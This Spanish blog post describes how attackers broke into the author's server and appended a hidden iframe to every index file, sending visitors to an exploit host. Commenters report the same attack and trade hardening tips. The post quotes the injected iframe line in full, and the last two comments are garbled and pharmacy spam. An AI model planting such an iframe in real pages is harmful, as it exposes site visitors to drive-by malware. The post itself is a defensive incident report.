Blog de Óscar del Río

1kg de tecnología, 250g de sociedad, economía y otras especias

¡Cuidado! Podrías estar redirigiendo a tus usuarios a sitios Malware

| 10 Comments

wallpaperxl0[1]
Desde anoche hasta esta tarde el blog no funcionaba. Fue debido a que unos atacantes comprometieron la seguridad de mi servidor (parece ser que el ftp) consiguiendo editar con éxito todos y cada uno de los ficheros que contenían la cadena “index” en su nombre (index.php,  index.html, index_extra.php…) en las diferentes carpetas del mismo.

La edición de los ficheros consistió en añadir una línea al final de todos ellos (index.htm, index.php…) con el siguiente código:

<iframe src="http://f5l.at:8080/ts/in.cgi?pepsi154" width=125 height=125 style="visibility: hidden"></iframe>

El objetivo era utilizar mi servidor para hacer un ataque de Frame Injection dirigiendo a los visitantes de mi sitio a la url http://f5l.at:8080/ts/in.cgi?pepsi154, en la que está alojado el exploit dirigido al usuario final, que presumiblemente intentará obtener datos privados del mismo o instalar software malicioso en su equipo.

Me di cuenta “gracias” a que WordPress dejó de funcionar, por lo que la pérdida del servicio que ha sufrido el blog ha sido, más que un problema, un aviso.

Además, este tipo de ataques no solo pueden dañar al visitante de tu sitio sino que pueden hacer que tu dominio acabe en un listado de sitios malware.

Ahora conviene estar alerta, a partir de hoy cada día revisaré si existen ficheros modificados en mi servidor web ya que no me gustaría enviar a mis visitantes a merced de los atacantes.

He buscado información sobre la URL y he visto a otra  persona que le ha sucedido lo mismo:

http://exbb.org/community/topic.php?forum=6&topic=127&postid=1250884659

(Para quienes no entiendan Ruso, entre los que me incluyo ;) , Aquí el link semitraducido por Google)

¿A alguien más le ha pasado?

Comprueba tus ficheros habitualmente, podrías estar redirigiendo sin saberlo a tus usuarios a un sitio Malware

10 Comments

  1. Quién sabe cómo lograron entrar, tal vez algún tema de permisos en las carpetas.

    Lo bueno es que lo detectaste rápido y no le dió tiempo a Google y otros detectar el problema, he visto sitios que terminan penalizados porque el webmaster no detecta a tiempo el ataque.

  2. me paso en unos sitios mios, tambien me entere q paso en sitios conocidos, algunos de hoteles o de vestimenta, hasta ahora, lo unico q veo en comun, es q se uso windows commander para acceder al ftp, y les paso a unos hostings, y no a otros..

    me gustaria saber relamente que hay q hacer para estar al tanto de esto.
    y como evitarlo.

    saludos.

  3. Estimados, yo tambien tube el mismo problema en varios de mis sitios… si encuentran cual fue la vulnerabilidad tengan a bien avisar :-) ya varios de mis sitios fueron catalogados como no confiables por google.

    Saludos

  4. Si tenéis acceso a crear CronJobs se puede programar una tarea que ejecute un script (por ejemplo en PHP) que sobreescriba cada cierto tiempo los index con las copias de seguridad que tengáis almacenadas.

    Otra opción, también si disponemos de cron, es hacer un script que compruebe regularmente las fechas de modificación de los index, y en caso de cambio avise por email.

    El problema es que en hostings compartidos generalmente no se disponen de estas opciones.

    Si a alguien se le ocurre algo mejor se lo agradezco

  5. Hola a todos
    Bueno primero que todo felicitar a todos por esta pagina y el foro esta muy interesante este tema en particular.

    Les cuento que tengo el mismo problema en mi pagina web de la empresa
    Constantemente e detectado que el código html de mi INDEX es modificado para agregarle el siguiente redireccionamiento Malware:
    f5l.ru:8080/index.php

    según mi proveedor de hostil el problema es por causa de una vulnerabilidad en el código de mi pagina y en ningun modo dan pie a que el problema es de parte de ellos.

    Espero alguno de ustedes pueda explicarme si es real lo que se me indica o realmente yo puedo como cliete exigir que se vean y reparen todas las vulnerabilidades de mi hostil.

    Espero podamos encontrar una pronta solución a este caso

    Gracias a todos

  6. Hola Fredy He editado tu comentario para eliminar el enlace a f5l.ru

    Podría ser por tu proveedor, aunque como te dicen también podría ser por alguna vulnerabilidad en tu código o incluso en el cliente con el que accedas a la FTP.

    Te recomiendo hacer lo siguiente:
    1. Cambia la contraseña de tu FTP
    2. Quita los permisos de escritura de aquellos archivos en los que no necesites escribir
    3. Analiza tu PC con antivirus / Antispyware o similares

    Un saludo

  7. Hola Oscar te cuento que ya efectué los pasos que me recomendaste y ya han pasado 4 días y sin problemas. Espero no tener más malos ratos con los malwares por que realmente son una molestia.

    Muchas gracias y felicidades por tu portal.

    Saludos
    Paz

  8. Quién sabe cómo lograron entrar, tal vez algún tema de permisos en las carpetas. Lo bueno es que lo detectaste rápido y no le dió tiempo a Google y otros detectar el problema, he visto sitios que terminan penalizados porque el webmaster no detecta a tiempo el ataque.

  9. When you are signing. This is the second school bus
    party. The first step to make proper repairs to
    major sponsors including drugs giant GlaxoSmithKline, telecoms group
    BT, oil has been in business. Are you looking for a
    large chunk of time. This will help you identify with some of the lights on imperfections in the U.

  10. [img]http://esfarm.eu/espa55.jpg[/img]

    Farmacia en linea. Precio mas bajo http://esfarm.eu/

Deja un comentario

Required fields are marked *.